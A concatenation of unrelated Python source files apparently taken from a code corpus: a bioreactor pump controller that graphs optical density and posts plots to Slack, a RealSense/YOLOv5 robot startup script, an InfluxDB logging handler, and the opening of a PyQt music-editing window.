pumpa = allpumps[['media','drug','waste']]
PUplt,PUax = plt.subplots()
PUax.plot(allODs[['average']], label= 'average', color='tab:blue')
PUax.plot(allODs[['min']], label= '_nolegend_', color = 'tab:grey', linestyle= ':')
PUax.set_ylabel(ylabel='Average OD')
lines, labels = PUax.get_legend_handles_labels()
DM = PUax.twinx()
DM.spines['right'].set_position(('axes', 1.0))
pumpa.plot(ax = DM,color=['tab:orange','tab:red','tab:green'],legend=False)
DM.set_yticklabels([])
line, label = DM.get_legend_handles_labels()
lines += line
labels += label
PUax.legend(lines, labels, loc=2)
# PUplt.axhline(y=self.OD_min, color='tab:grey', linestyle=':')
# PUplt.axhline(y=self.OD_thr, color='tab:grey', linestyle=':')
# PUfig = PUplt.get_figure()
PUplt.savefig("%s/%s/%s/PUplot_%s.png" % (self.root_dir, self.sysstr, self.start_time, self.start_time))
PUplt.figure = None; PUplt = None; allconcs= None; colors = None; DM = None; pumpa = None
plt.close('all')
with open("%s/%s/%s/PUplot_%s.png" % (self.root_dir, self.sysstr, self.start_time, self.start_time), "rb") as file_content:
pumsg = self.slack_client.api_call(
"files.upload",
channels = self.chan,
thread_ts = self.threadts,
title = "PUPlot",
file = file_content
)
# THREADS GRAPH
plt.rcParams["figure.dpi"] = 200
ODthr = (allODs[['average']]).plot(label='average', color='tab:blue') #figsize=(10,10) in the plot
ODthr.set_ylabel(ylabel='Average OD')
lines, labels = ODthr.get_legend_handles_labels()
DM = ODthr.twinx()
DM.spines['right'].set_position(('axes', 1.0))
allODs[['threads']].plot(ax = DM, label='threads',color='tab:purple',legend=False)
DM.set_ylabel(ylabel='Active Threads')
line, label = DM.get_legend_handles_labels()
lines += line
labels += label
ODthr.legend(lines, labels, loc=2)
# ODplt = (allODs[['current']]).plot() #figsize=(10,10) in the plot
ODfig = ODthr.get_figure()
ODfig.savefig("%s/%s/%s/ODthreads_%s.png" % (self.root_dir, self.sysstr, self.start_time, self.start_time))
ODfig.clf(); ODthr.figure = None; ODthr = None; ODfig = None; fig = None; allconcs= None; colors = None; DM = None
plt.close('all')
with open("%s/%s/%s/ODthreads_%s.png" % (self.root_dir, self.sysstr, self.start_time, self.start_time), "rb") as file_content:
thrmsg = self.slack_client.api_call(
"files.upload",
channels = self.chan,
thread_ts = self.threadts,
title = "ODThreads",
file = file_content
)
# TEMP GRAPH
if self.temp_sensor:
plt.rcParams["figure.dpi"] = 200
ODthr = (allODs[['average']]).plot(label='average', color='tab:blue') #figsize=(10,10) in the plot
ODthr.set_ylabel(ylabel='Average OD')
lines, labels = ODthr.get_legend_handles_labels()
DM = ODthr.twinx()
DM.spines['right'].set_position(('axes', 1.0))
allODs[['temp']].plot(ax = DM, label='threads',color='tab:pink',legend=False)
DM.set_ylabel(ylabel='Incubator Temperature (C)')
line, label = DM.get_legend_handles_labels()
lines += line
labels += label
ODthr.legend(lines, labels, loc=2)
# ODplt = (allODs[['current']]).plot() #figsize=(10,10) in the plot
ODfig = ODthr.get_figure()
ODfig.savefig("%s/%s/%s/ODtemp_%s.png" % (self.root_dir, self.sysstr, self.start_time, self.start_time), bbox_inches='tight')
ODfig.clf(); ODthr.figure = None; ODthr = None; ODfig = None; fig = None; allconcs= None; colors = None; DM = None
plt.close('all')
with open("%s/%s/%s/ODtemp_%s.png" % (self.root_dir, self.sysstr, self.start_time, self.start_time), "rb") as file_content:
tempmsp = self.slack_client.api_call(
"files.upload",
channels = self.chan,
thread_ts = self.threadts,
title = "ODTemp",
file = file_content
)
# DIL RATE GRAPH
plt.rcParams["figure.dpi"] = 200
ODthr = (allODs[['average']]).plot(label='average', color='tab:blue') #figsize=(10,10) in the plot
ODthr.set_ylabel(ylabel='Average OD')
lines, labels = ODthr.get_legend_handles_labels()
DM = ODthr.twinx()
DM.spines['right'].set_position(('axes', 1.0))
allpumps[['dil_rate']].plot(ax = DM, label='threads',color='tab:grey',legend=False)
DM.set_ylabel(ylabel='Dilution Rate (Hz)')
line, label = DM.get_legend_handles_labels()
lines += line
labels += label
ODthr.legend(lines, labels, loc=2)
# ODplt = (allODs[['current']]).plot() #figsize=(10,10) in the plot
ODfig = ODthr.get_figure()
ODfig.savefig("%s/%s/%s/ODdilR_%s.png" % (self.root_dir, self.sysstr, self.start_time, self.start_time))
ODfig.clf(); allODs = None; allpumps = None; ODthr.figure = None; ODthr = None; ODfig = None; fig = None; allconcs= None; colors = None; DM = None
plt.close('all')
with open("%s/%s/%s/ODdilR_%s.png" % (self.root_dir, self.sysstr, self.start_time, self.start_time), "rb") as file_content:
dilrmsg = self.slack_client.api_call(
"files.upload",
channels = self.chan,
thread_ts = self.threadts,
title = "ODDilR",
file = file_content
)
if self.firstrec:
self.recmes = self.slack_client.api_call(
"chat.postMessage",
channel = self.chan,
username=self.sysstr,
icon_url = self.slack_usericon,
text = ('Elapsed Time: %s ; OD = %.3f' % (self.secondsToText(int(self.elapsed_time.total_seconds())),self.currOD)),
thread_ts = self.recgrats
)
with open("%s/%s/%s/ODplot_%s.png" % (self.root_dir, self.sysstr, self.start_time, self.start_time), "rb") as file_content:
self.recod = self.slack_client.api_call(
"files.upload",
channels = self.chan,
thread_ts = self.recgrats,
title = "ODPlot",
file = file_content
)
with open("%s/%s/%s/ODconc_%s.png" % (self.root_dir, self.sysstr, self.start_time, self.start_time), "rb") as file_content:
self.recodc = self.slack_client.api_call(
"files.upload",
channels = self.chan,
thread_ts = self.recgrats,
title = "ODConc",
file = file_content
)
with open("%s/%s/%s/PUplot_%s.png" % (self.root_dir, self.sysstr, self.start_time, self.start_time), "rb") as file_content:
self.recpu = self.slack_client.api_call(
"files.upload",
channels = self.chan,
thread_ts = self.recgrats,
title = "PUPlot",
file = file_content
)
with open("/%s/%s/%s/ODthreads_%s.png" % (self.root_dir, self.sysstr, self.start_time, self.start_time), "rb") as file_content:
self.rethr = self.slack_client.api_call(
"files.upload",
channels = self.chan,
thread_ts = self.recgrats,
title = "ODThreads",
file = file_content
)
if self.temp_sensor:
with open("%s/%s/%s/ODtemp_%s.png" % (self.root_dir, self.sysstr, self.start_time, self.start_time), "rb") as file_content:
self.retmp = self.slack_client.api_call(
"files.upload",
channels = self.chan,
thread_ts = self.recgrats,
title = "ODTemp",
file = file_content
)
# print(self.recod['file']['shares']['public'][self.chanid][0]['ts'])
with open("%s/%s/%s/ODdilR_%s.png" % (self.root_dir, self.sysstr, self.start_time, self.start_time), "rb") as file_content:
self.redilr = self.slack_client.api_call(
"files.upload",
channels = self.chan,
thread_ts = self.recgrats,
title = "ODDilR",
file = file_content
)
self.firstrec = False
else:
delmsg = self.slack_client.api_call(
"chat.delete",
channel = self.chanid,
ts = self.recmes['ts']
)
delod = self.slack_client.api_call(
"chat.delete",
channel = self.chanid,
ts = self.recod['file']['shares']['public'][self.chanid][0]['ts']
)
delodc = self.slack_client.api_call(
"chat.delete",
channel = self.chanid,
ts = self.recodc['file']['shares']['public'][self.chanid][0]['ts']
)
delrec = self.slack_client.api_call(
"chat.delete",
channel = self.chanid,
ts = self.recpu['file']['shares']['public'][self.chanid][0]['ts']
)
delthr = self.slack_client.api_call(
"chat.delete",
channel = self.chanid,
ts = self.rethr['file']['shares']['public'][self.chanid][0]['ts']
)
if self.temp_sensor:
deltmp = self.slack_client.api_call(
"chat.delete",
channel = self.chanid,
ts = self.retmp['file']['shares']['public'][self.chanid][0]['ts']
)
deldilr = self.slack_client.api_call(
"chat.delete",
channel = self.chanid,
ts = self.redilr['file']['shares']['public'][self.chanid][0]['ts']
)
self.recmes = self.slack_client.api_call(
"chat.postMessage",
channel = self.chan,
username=self.sysstr,
icon_url = self.slack_usericon,
text = ('Elapsed Time: %s ; OD = %.3f' % (self.secondsToText(int(self.elapsed_time.total_seconds())),self.currOD)),
thread_ts = self.recgrats
)
with open("%s/%s/%s/ODplot_%s.png" % (self.root_dir, self.sysstr, self.start_time, self.start_time), "rb") as file_content:
self.recod = self.slack_client.api_call(
"files.upload",
channels = self.chan,
thread_ts = self.recgrats,
title = "ODPlot",
file = file_content
)
with open("%s/%s/%s/ODconc_%s.png" % (self.root_dir, self.sysstr, self.start_time, self.start_time), "rb") as file_content:
self.recodc = self.slack_client.api_call(
"files.upload",
channels = self.chan,
thread_ts = self.recgrats,
title = "ODConc",
file = file_content
)
with open("%s/%s/%s/PUplot_%s.png" % (self.root_dir, self.sysstr, self.start_time, self.start_time), "rb") as file_content:
self.recpu = self.slack_client.api_call(
"files.upload",
channels = self.chan,
thread_ts = self.recgrats,
title = "PUPlot",
file = file_content
)
with open("%s/%s/%s/ODthreads_%s.png" % (self.root_dir, self.sysstr, self.start_time, self.start_time), "rb") as file_content:
self.rethr = self.slack_client.api_call(
"files.upload",
channels = self.chan,
thread_ts = self.recgrats,
title = "ODThreads",
file = file_content
)
if self.temp_sensor:
with open("%s/%s/%s/ODtemp_%s.png" % (self.root_dir, self.sysstr, self.start_time, self.start_time), "rb") as file_content:
self.retmp = self.slack_client.api_call(
"files.upload",
channels = self.chan,
thread_ts = self.recgrats,
title = "ODTemp",
file = file_content
)
with open("%s/%s/%s/ODdilR_%s.png" % (self.root_dir, self.sysstr, self.start_time, self.start_time), "rb") as file_content:
self.redilr = self.slack_client.api_call(
"files.upload",
channels = self.chan,
thread_ts = self.recgrats,
title = "ODDilR",
file = file_content
)
except Exception as e:
exc_type, exc_obj, exc_tb = sys.exc_info()
fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]
print(exc_type, fname, exc_tb.tb_lineno)
pass
self.thread_locks['graphs'].release()
def dynLimit(self):
self.thread_locks['dynL'].acquire()
self.growthOD.append(self.avOD)
self.growthrate_t.append((self.elapsed_time.total_seconds()/3600))
if len(self.growthOD) == self.avefac:
god_temp = np.diff(self.growthOD)/np.diff(self.growthrate_t)
self.growthrate.append(sum(god_temp)/len(god_temp))
self.growthOD.pop(0)
if len(self.growthrate) < self.avefac:
self.growthrate_t.pop(0)
if len(self.growthrate) == self.avefac:
gr_temp = np.diff(self.growthrate)/np.diff(self.growthrate_t)
self.growthrate2.append(sum(gr_temp)/len(gr_temp))
self.growthrate.pop(0)
self.growthrate_t.pop(0)
if len(self.growthrate2) == self.avefac:
self.instant_gr = sum(god_temp)/len(god_temp)
self.instant_gr2 = sum(gr_temp)/len(gr_temp)
self.growthrate2.pop(0)
if self.instant_gr > self.OD_err and self.instant_gr2 < 0.01:
self.OD_thr_set = True
self.OD_min = self.avOD
self.OD_thr = self.OD_min*1.25
self.thread_locks['dynL'].release()
def control_alg(self):
try:
print_buffer = 0
self.init_pins(self.pin_list)
if self.selection == 'toprak':
if self.avOD > self.OD_min:
self.pump_waste()
if self.avOD > self.OD_thr and self.avOD > self.last_dilutionOD:
self.pump_drug()
else:
self.pump_media()
else: #report even when pumps aren't activated yet
self.no_pump()
elif self.selection == 'constant':
if self.avOD > self.OD_min:
self.pump_waste()
if self.vial_drug_mass/self.culture_vol < self.vial_conc:
self.pump_drug()
else:
self.pump_media()
else: #report even when pumps aren't activated yet
self.no_pump()
self.dil_rate_calc()
self.last_dilutionOD = self.avOD
except Exception as e:
print ('[%s] CA - WARNING ADC REQUEST CRASHED' % self.sysstr)
print(e)
exc_type, exc_obj, exc_tb = sys.exc_info()
fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]
print(exc_type, fname, exc_tb.tb_lineno)
pass
self.thread_locks['control_alg'].release()
def pump_waste(self):
self.pump_on(self.P_waste_pins)
time.sleep(self.P_waste_times)
self.pump_off(self.P_waste_pins)
self.waste = 3
self.vial_drug_mass = self.vial_drug_mass - (self.vial_drug_mass/self.culture_vol)
def pump_drug(self):
print('[%s] OD Threshold exceeded, pumping %s' % (self.sysstr,self.drug_name))
self.pump_on(self.P_drug_pins)
time.sleep(self.P_drug_times)
self.pump_off(self.P_drug_pins)
self.drug = 2
self.pump_act_times.append(self.P_drug_times)
self.vial_drug_mass = self.vial_drug_mass + self.drug_conc * self.P_drug_times * self.drug_flo_rate
drugamsg = self.slack_client.api_call(
"chat.postMessage",
channel = self.chan,
username=self.sysstr,
icon_url = self.slack_usericon,
thread_ts = self.threadts,
text = "OD = %0.3f, pumping %s. Drug concentration: %f ug/mL" % (self.avOD, self.drug_name, (self.vial_drug_mass)/self.culture_vol)
)
def pump_media(self):
print('[%s] OD below threshold, pumping nutrient' % self.sysstr)
self.pump_on(self.P_nut_pins)
time.sleep(self.P_nut_times)
self.pump_off(self.P_nut_pins)
self.nut = 1
self.pump_act_times.append(self.P_nut_times)
thramgs = self.slack_client.api_call(
"chat.postMessage",
channel = self.chan,
username=self.sysstr,
icon_url = self.slack_usericon,
thread_ts = self.threadts,
text = "OD = %0.3f, pumping nutrient. %s concentration: %f ug/mL" % (self.avOD, self.drug_name.capitalize(), (self.vial_drug_mass)/self.culture_vol)
)
def no_pump(self):
self.pump_act_times.append(0)
# self.vial_drug_mass = 0 if self.vial_drug_mass < 0
thrbmsg = self.slack_client.api_call(
"chat.postMessage",
channel = self.chan,
username=self.sysstr,
icon_url = self.slack_usericon,
thread_ts = self.threadts,
text = "OD = %0.3f, OD below nutrient pump threshold." % (self.avOD)
)
def dil_rate_calc(self):
if len(self.pump_act_times) > 3:
self.pump_act_times.pop(0)
if self.drug == 2:
self.dil_rate = self.drug_flo_rate * self.pump_act_times[-1]/(self.time_between_pumps * self.culture_vol)
elif self.nut == 1:
self.dil_rate = self.nut_flo_rate * self.pump_act_times[-1]/(self.time_between_pumps * self.culture_vol)
else:
self.dil_rate= 0
# self.dil_rate_smo = self.pump_flo_rate * np.mean(self.pump_act_times)/(self.time_between_pumps * self.culture_vol)
def secondsToText(self,secs):
if secs:
days = secs//86400
hours = (secs - days*86400)//3600
minutes = (secs - days*86400 - hours*3600)//60
seconds = secs - days*86400 - hours*3600 - minutes*60
result = ("{0} day{1}, ".format(days, "s" if days!=1 else "") if days else "") + \
("{0} hour{1}, ".format(hours, "s" if hours!=1 else "") if hours else "") + \
("{0} minute{1}, ".format(minutes, "s" if minutes!=1 else "") if minutes else "") + \
("{0} second{1}, ".format(seconds, "s" if seconds!=1 else "") if seconds else "")
return result[:-2]
else:
return "0 seconds"
def on_timer(self):
self.loops += 1
if self.loops < self.total_time/self.time_between_ODs:
threading.Timer(self.time_between_ODs,self.on_timer).start()
else:
self.now = datetime.now()
self.nows = time.time()
print('[%s] Experiment Complete at %02s:%02s:%02s ' % (self.sysstr, self.now.hour, self.now.minute, self.now.second))
# GPIO.output(P_fan_pins,0)
compmsg = self.slack_client.api_call(
"chat.postMessage",
channel = self.chan,
username=self.sysstr,
icon_url = self.slack_usericon,
thread_ts = self.threadts,
text = "Experiment Complete at %02s:%02s:%02s " % (self.now.hour, self.now.minute, self.now.second)
)
if self.loops > 1:
if not self.thread_locks['threads'].locked():
self.threads['threads'] = threading.Thread(target=self.thread_split())
self.threads['threads'].start()
else:
self.threads['threads'] = threading.Thread(target=self.thread_split())
self.threads['threads'].start()
def thread_split(self):
self.thread_locks['threads'].acquire()
self.now = datetime.now()
self.nows = time.time()
#print(self.loops)
self.elapsed_time = self.now - self.start_time
self.active_threads = threading.active_count()
# Count see if the thread is locked for a long time
global i2c_q
global graph_q
if self.loops > 1:
if not self.thread_locks['adc'].locked():
self.thread_locks['adc'].acquire()
i2c_q.append(str(self.sysnum-1)+'OD')
if not self.thread_locks['dynL'].locked():
if (self.loops % int(self.thresh_check*60/self.time_between_ODs)) == 0 and not self.OD_thr_set:
self.threads['dynL'] = threading.Thread(target=self.dynLimit)
self.threads['dynL'].start()
if not self.thread_locks['control_alg'].locked():
if self.loops % (self.loops_between_pumps) == 0:
self.thread_locks['control_alg'].acquire()
i2c_q.append(str(self.sysnum-1)+'CA')
if not self.thread_locks['graphs'].locked():
if (self.loops % int(self.time_between_graphs*60/self.time_between_ODs)) == 0:
self.thread_locks['graphs'].acquire()
graph_q.append(self.sysnum-1)
else:
self.thread_locks['adc'].acquire()
i2c_q.append(str(self.sysnum-1)+'OD')
if (self.loops % int(self.thresh_check*60/self.time_between_ODs)) == 0 and not self.OD_thr_set:
self.threads['dynL'] = threading.Thread(target=self.dynLimit)
self.threads['dynL'].start()
if self.loops % (self.loops_between_pumps) == 0:
self.thread_locks['control_alg'].acquire()
i2c_q.append(str(self.sysnum-1)+'CA')
if (self.loops % int(self.time_between_graphs*60/self.time_between_ODs)) == 0:
self.thread_locks['graphs'].acquire()
graph_q.append(self.sysnum-1)
# save the data to disk if it's time
if (self.loops % int(self.time_between_saves*60/self.time_between_ODs)) == 0:
if self.printing:
print('[%s] Saving to disk' % self.sysstr)
self.threads['save'] = threading.Thread(target=self.savefunc)
self.threads['save'].start()
else:
if self.printing:
print('[%s] Buffering Data' % self.sysstr)
self.threads['buffer'] = threading.Thread(target=self.bufferdata)
self.threads['buffer'].start()
if self.printing:
print ('[%s] Elapsed Time: %s ; Threads = %d ; OD = %.3f' % (self.sysstr, self.secondsToText(int(self.elapsed_time.total_seconds())),self.active_threads,self.currOD))
self.thread_locks['threads'].release()
chips = IC_init()
threading.Thread(target = i2c_controller).start()
threading.Thread(target = graph_controller).start()
if config['MAIN'].getboolean('temp_sensor'): threading.Thread(target = temp_sensor_func).start()
eve_starter()
threading.Thread(target = live_plotter).start()
# threading.Thread(target = slackresponder).start()
|
main.py
|
"""
main module initializes yolov5,
rs pipeline,
and starts algorithm
"""
from threading import Thread
from time import sleep
import pyrealsense2 as rs
import cv2
import numpy as np
import sys
import torch
from pathlib import Path
import algorithm
from robot import getrobot, set_init_ori
from phoenixutils import valid_pred
import detect
#sys.path.append('yolov5')
robot = getrobot()
set_init_ori(robot)
# initialize object for storing color and depth frames from cameras
storage = detect.ProcessPrediction([416,736]) #should be set automatically
# configure realsense pipeline
pipeline = rs.pipeline()
config = rs.config()
pipeline.start(config)
pipeline_wrapper = rs.pipeline_wrapper(pipeline)
pipeline_profile = config.resolve(pipeline_wrapper)
device = pipeline_profile.get_device()
device_product_line = str(device.get_info(rs.camera_info.product_line))
found_rgb = False
for s in device.sensors:
if s.get_info(rs.camera_info.name) == 'RGB Camera':
found_rgb = True
break
if not found_rgb:
print("The script requires Depth camera with Color sensor")
exit(0)
config.enable_stream(rs.stream.depth, 640, 480, rs.format.z16, 30)
config.enable_stream(rs.stream.color, 1280, 720, rs.format.bgr8, 30)
if device_product_line == 'L500':
config.enable_stream(rs.stream.color, 960, 540, rs.format.bgr8, 30)
#else:
# config.enable_stream(rs.stream.color, 640, 480, rs.format.bgr8, 30)
# initialization done
# configure yolov5 inference function
opt = vars(detect.parse_opt())
# set arguments
opt['weights'] = 'yolov5weights/type2_1.2.pt' # model.pt path(s)
opt['source'] = 'realsense' # ROOT / 'data/images', # file/dir/URL/glob, 0 for webcam
opt['imgsz'] = 800 # inference size (pixels)
opt['conf_thres'] = 0.25 # confidence threshold
opt['iou_thres'] = 0.1 # NMS IOU threshold
opt['max_det'] = 2 # maximum detections per image
opt['view_img'] = True
opt['store_prediction'] = storage # False if not to store prediction, ProcessPrediction object if you want to store it
opt['realsense_pipeline'] = pipeline
# run inference on the separated (background) thread
detection_thread = Thread(target=detect.run, kwargs=opt)
detection_thread.start()
# configure and start algorithm
algorithm = algorithm.Algorithm(pipeline, storage, robot)
algorithm.run()
# visualization MIGHT be unused
def visualizeimg(img_source):
while True:
cv2.namedWindow("PhoenixBot", cv2.WINDOW_AUTOSIZE)
#cv2.resizeWindow("PhoenixBot", 800, 600)
print(img_source.anoimg)
cv2.imshow("PhoenixBot", img_source.anoimg)
cv2.waitKey(1000) # 1 milliseond
visualization_thread = Thread(target=visualizeimg, args=(storage,))
"""
def midpoint_of_line(pts):
return [(pts[0][0]+pts[0][1])/2, (pts[1][0]+pts[1][1])/2]
while True:
frames = pipeline.wait_for_frames()
sleep(1)
if not frames:
print("noframe")
continue
if len(storage.boxes):
for box,cls,conf in zip(storage.boxes, storage.classes, storage.confs):
if int(cls) == 1:
# find coordinates of pixel in depth map
depth_pixel = box[0]
depth_frame = frames.get_depth_frame()
color_frame = frames.get_color_frame()
depthmap_dim = np.asanyarray(depth_frame.get_data()).shape
colormap_dim = np.asanyarray(color_frame.get_data()).shape
color_pixel = [depth_pixel[0]*colormap_dim[1],depth_pixel[1]*colormap_dim[0]]
depth_pixel = [depth_pixel[0] *depthmap_dim[1], depth_pixel[1] *depthmap_dim[0]]
depth_value = np.asanyarray(depth_frame.get_data())[int(depth_pixel[1])][int(depth_pixel[0])]
depth_intrin = depth_frame.profile.as_video_stream_profile().intrinsics
depth_point = rs.rs2_deproject_pixel_to_point(depth_intrin, depth_pixel, depth_value)
storage.circle_coords = (int(color_pixel[0]),int(color_pixel[1]))
print(depth_point)
#print(storage.anoimg.shape)
#print(check_imshow())
#print("here")
#cv2.namedWindow("PhoenixBot", cv2.WINDOW_AUTOSIZE)
#print("there")
#cv2.resizeWindow("PhoenixBot", 800, 600)
#print(storage.anoimg)
#cv2.imshow("PhoenixBot", storage.anoimg)
#cv2.waitKey(10)# 1 milliseond
"""
"""
storage.process()
classes = []
midpoint_classes = []
for box in storage.boxes:
classes.append(int(box.cls))
midpoint_classes.append(box.midpoint())
#print(storage.normalize(box.midpoint()))
if len(classes)!=2:
print('Not enough classes detected')
continue
if classes[0] == classes[1]:
print ('Detected two boxes of one class')
continue
else:
depth_pixel = midpoint_of_line(midpoint_classes)
#print(depth_pixel)
depth_frame = frames.get_depth_frame()
#print(np.asanyarray(depth_frame.get_data()).shape)
depth_value = np.asanyarray(depth_frame.get_data())[int(depth_pixel[1])][int(depth_pixel[0])]
depth_intrin = depth_frame.profile.as_video_stream_profile().intrinsics
# = 0.5
#depth_pixel = [depth_intrin.ppx, depth_intrin.ppy]
depth_point = rs.rs2_deproject_pixel_to_point(depth_intrin, depth_pixel, depth_value)
#print(depth_point)
"""
"""
try:
while True:
# Wait for a coherent pair of frames: depth and color
frames = pipeline.wait_for_frames()
color_frame = frames.get_color_frame()
if not color_frame:
continue
# Convert images to numpy arrays
color_image = np.asanyarray(color_frame.get_data())
color_image = cv2.cvtColor(color_image, cv2.COLOR_BGR2RGB)
except Exception as e:
print(e)
finally:
# Stop streaming
pipeline.stop()
"""
|
handler.py
|
import logging
import queue
import sys
import threading
import traceback
from logging.handlers import BufferingHandler
from queue import Queue
import time
from influxdb import InfluxDBClient
PY3 = sys.version_info[0] == 3
WAN_CHUNK, LAN_CHUNK = 1420, 8154
if PY3:
data, text = bytes, str
else:
data, text = str, unicode
# skip_list is used to filter additional fields in a log message.
# It contains all attributes listed in
# http://docs.python.org/library/logging.html#logrecord-attributes
# plus exc_text, which is only found in the logging module source,
# and id, which is prohibited by the GELF format.
SKIP_ATTRIBUTES = [
'args', 'asctime', 'created', 'exc_text', 'filename',
'funcName', 'id', 'levelname', 'levelno', 'lineno', 'module',
'msecs', 'message', 'msg', 'name', 'pathname', 'process',
'processName', 'stack_info', 'relativeCreated', 'thread', 'threadName'
]
STACKTRACE_ATTRIBUTE = 'exc_info'
DEFAULT_TAGS = {
'filename': 'source.fileName',
'funcName': 'source.methodName',
'levelname': 'level',
'lineno': 'source.lineNumber',
'thread': 'threadId',
'threadName': 'threadName',
'processName': 'processName'
}
DEFAULT_FIELDS = {
'message': 'message',
'msg': 'message'
}
class InfluxHandler(logging.Handler):
"""InfluxDB logging handler
:param database: The database you want log entries to go into.
:param measurement: Replace measurement with specified value. If not specified,
record.name will be passed as `logger` parameter.
:param lazy_init: Enable lazy initialization. Defaults to False.
:param include_fields: Include additional fields. Defaults to {}.
:param include_tags: Include additional tags. Defaults to {}.
:param extra_fields: Add extra fields if found. Defaults to True.
:param extra_tags: Add extra tags if found. Defaults to True.
:param include_stacktrace: Add stacktraces. Defaults to True.
:param exclude_tags: Exclude list of tag names. Defaults to [].
:param exclude_fields: Exclude list of field names. Defaults to [].
:param **influxdb_opts: InfluxDB client options
"""
def __init__(self,
database: str,
measurement: str = None,
retention_policy: str = None,
backpop: bool = True,
lazy_init: bool = False,
include_tags: dict = {},
include_fields: dict = {},
exclude_tags: list = [],
exclude_fields: list = [],
extra_tags: bool = True,
extra_fields: bool = True,
include_stacktrace: bool = True,
**influxdb_opts
):
logging.Handler.__init__(self)
self._measurement = measurement
self._client = InfluxDBClient(database=database, **influxdb_opts)
self._backpop = backpop
self._retention_policy = retention_policy
# extend tags to include
self._include_tags = DEFAULT_TAGS
self._include_tags.update(include_tags)
# extend fields to include
self._include_fields = DEFAULT_FIELDS
self._include_fields.update(include_fields)
self._extra_tags = extra_tags
self._extra_fields = extra_fields
self._include_stacktrace = include_stacktrace
self._exclude_tags = exclude_tags
self._exclude_fields = exclude_fields
if lazy_init is False:
if database not in {x['name'] for x in self._client.get_list_database()}:
self._client.create_database(database)
def get_client(self):
return self._client
def emit(self, record):
"""
Emit a record.
Send the record to the Web server as line protocol
"""
self._client.write_points(self._get_point(record), retention_policy=self._retention_policy)
def _convert_to_point(self, key, value, fields={}, tags={}):
if value is None:
return
elif isinstance(value, dict):
for k in value.items():
if key:
self._convert_to_point(key + '.' + k, value[k], fields, tags)
else:
self._convert_to_point(k, value[k], fields, tags)
elif isinstance(value, list):
self._convert_to_point(key, ' '.join(value), fields, tags)
else:
if key in self._include_tags:
if key not in self._exclude_tags:
tags[self._include_tags.get(key)] = value
elif key in self._include_fields:
if key not in self._exclude_fields:
fields[self._include_fields.get(key)] = value
elif key == STACKTRACE_ATTRIBUTE and self._include_stacktrace:
if isinstance(value, tuple):
# exc_info is defined as a tuple
tags['thrown.type'] = value[0].__name__
fields['thrown.message'] = str(value[1])
fields['thrown.stackTrace'] = ''.join(traceback.format_exception(*value))
elif key in SKIP_ATTRIBUTES:
return
else:
if isinstance(value, int) or isinstance(value, float) or isinstance(value, bool):
if self._extra_fields and key not in self._exclude_fields:
fields[key] = value
else:
if self._extra_tags and key not in self._exclude_tags:
tags[key] = value
def _get_point(self, record):
fields = {}
tags = {}
for record_name, record_value in record.__dict__.items():
# ignore methods
if record_name.startswith('_'):
continue
self._convert_to_point(record_name, record_value, fields, tags)
if self._measurement:
ret = [{
"measurement": self._measurement,
"tags": tags,
"fields": fields,
"time": int(record.created * 10 ** 9) # nanoseconds
}]
elif not self._backpop:
ret = [{
"measurement": record.name.replace(".", ":") or 'root',
"tags": tags,
"fields": fields,
"time": int(record.created * 10 ** 9) # nanoseconds
}]
else:
ret = []
names = record.name.split('.')
rname = names[0] or 'root'
ret.append({
"measurement": rname,
"tags": tags,
"fields": fields,
"time": int(record.created * 10 ** 9) # nanoseconds
})
for sub in names[1:]:
rname = f"{rname}:{sub}"
ret.append({
"measurement": rname,
"tags": tags,
"fields": fields,
"time": int(record.created * 10 ** 9) # nanoseconds
})
return ret
class BufferingInfluxHandler(InfluxHandler, BufferingHandler):
"""InfluxDB Log handler
:param capacity: The number of points to buffer before sending to InfluxDB.
:param flush_interval: Interval in seconds between flushes, maximum. Defaults to 5 seconds
:param kwargs: Pass these args to the InfluxHandler
"""
def __init__(self,
capacity: int = 64,
flush_interval: int = 5,
**kwargs
):
self._flush_interval = flush_interval
InfluxHandler.__init__(self, **kwargs)
BufferingHandler.__init__(self, capacity)
self._thread = None if flush_interval is None else threading.Thread(
target=self._flush_thread, name="BufferingInfluxHandler", daemon=True)
self._thread.start()
def emit(self, record):
BufferingHandler.emit(self, record)
def _flush_thread(self):
while True:
time.sleep(self._flush_interval)
self.flush()
def flush(self):
self.acquire()
try:
if len(self.buffer):
# process all the buffered records
points = []
for record in self.buffer:
points.extend(self._get_point(record))
self._client.write_points(points, retention_policy=self._retention_policy)
# clear the buffer
self.buffer.clear()
finally:
self.release()
class AsyncInfluxHandler(InfluxHandler):
"""InfluxDB Asynchronous logging handler
:param kwargs: Pass these args to the InfluxHandler
"""
_sentinel = None
def __init__(self, **kwargs):
InfluxHandler.__init__(self, **kwargs)
self._queue: Queue = Queue()
self._thread: threading.Thread = threading.Thread(target=self._monitor)
self._thread.daemon = True
self._thread.start()
def _monitor(self):
q = self._queue
has_task_done = hasattr(q, 'task_done')
while True:
try:
record = self._dequeue(True)
if record is self._sentinel:
break
# write record
super().emit(record)
if has_task_done:
q.task_done()
except queue.Empty:
break
def _enqueue_sentinel(self):
self._queue.put_nowait(self._sentinel)
def _enqueue(self, record):
self._queue.put_nowait(record)
def _dequeue(self, block):
return self._queue.get(block)
def emit(self, record):
self._enqueue(record)
def stop(self):
self._enqueue_sentinel()
self._thread.join()
self._thread = None
|
mainwindow.py
|
# QT
from PyQt5.QtWidgets import QMainWindow, QLabel, QApplication
from PyQt5.QtGui import QPixmap
# External
from music21 import *
from pygame import mixer
import pygame
import numpy as np
# Internal
from mainwindow_ui import *
from add_track import *
from about import *
from dialog2 import *
from utils import *
TEMP_MIDI = 'temp.mid' # holds data about current track
LILY_ENABLED = False
class MainWindow(QMainWindow):
def __init__(self):
super().__init__()
self.ui = Ui_MainWindow()
self.ui.setupUi(self)
self.init_variables()
self.ui.label.setPixmap(QPixmap(''))
self.ui.note1.clicked.connect(self.on_note1_clicked)
self.ui.note2.clicked.connect(self.on_note2_clicked)
self.ui.note3.clicked.connect(self.on_note3_clicked)
self.ui.random_note.clicked.connect(self.on_random_note_clicked)
self.ui.custom_btn.clicked.connect(self.on_custom_btn_clicked)
self.ui.add_track_btn.clicked.connect(self.on_add_track_btn_clicked)
self.ui.comboBox_2.currentIndexChanged.connect(self.on_comboBox_2_currentIndexChanged)
#toolbar buttons
self.ui.actionLoad_File.triggered.connect(self.load_file_clicked)
self.ui.actionOptions.triggered.connect(self.save_file_clicked)
self.ui.actionAbout.triggered.connect(self.displayAbout)
self.ui.actionNew.triggered.connect(self.new_clicked)
self.ui.comboBox.currentIndexChanged.connect(self.on_comboBox_currentIndexChanged)
#view
self.ui.tabWidget.currentChanged.connect(self.on_change_tab)
# audio backend
